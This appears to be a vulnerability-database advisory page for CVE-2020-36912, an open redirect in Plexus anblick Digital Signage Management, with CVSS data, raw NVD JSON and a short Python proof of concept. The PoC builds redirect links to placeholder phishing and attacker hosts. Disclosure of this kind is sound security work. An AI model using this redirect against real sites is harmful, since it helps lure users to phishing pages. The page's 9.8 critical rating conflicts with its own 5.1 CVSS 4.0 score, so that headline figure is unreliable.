Security Vulnerability Report
中文
CVE-2020-36912 CVSS 9.8 CRITICAL

CVE-2020-36912

Published: 2026-01-06 16:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Plexus anblick Digital Signage Management 3.1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2020-36912 Open Redirect PoC ## Target: Plexus anblick Digital Signage Management 3.1.13 ## Vulnerability: Open redirect via 'pagina' GET parameter in PantallaLogin import urllib.parse def generate_malicious_url(target_url, redirect_target): """ Generate malicious URL for open redirect exploitation Args: target_url: Base URL of vulnerable application redirect_target: Malicious site to redirect victims to Returns: Malicious URL string """ # Encode the redirect target to bypass basic filters encoded_target = urllib.parse.quote(redirect_target, safe='') # Construct the exploit URL with the vulnerable 'pagina' parameter malicious_url = f"{target_url}/PantallaLogin?pagina={encoded_target}" return malicious_url # Example usage exploit_url = generate_malicious_url( target_url="https://vulnerable-server.com", redirect_target="https://phishing-site.com" ) print(f"Malicious URL: {exploit_url}") print(f"When victim visits this URL and logs in, they will be redirected to phishing-site.com") # Alternative direct PoC (unencoded) # https://vulnerable-server.com/PantallaLogin?pagina=https://attacker.com

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36912", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.027", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter."}, {"lang": "es", "value": "Plexus anblick Digital Signage Management 3.1.13 contiene una vulnerabilidad de redirección abierta en el script 'PantallaLogin' que permite a los atacantes manipular el parámetro GET 'pagina'. Los atacantes pueden crear enlaces maliciosos que redirigen a los usuarios a sitios web arbitrarios aprovechando una validación de entrada incorrecta en el parámetro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/185521", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/158473", "source": "[email protected]"}, {"url": "https://www.plexus.es/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/plexus-anblick-digital-signage-management-open-redirect-via-pagina-parameter", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5573.php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.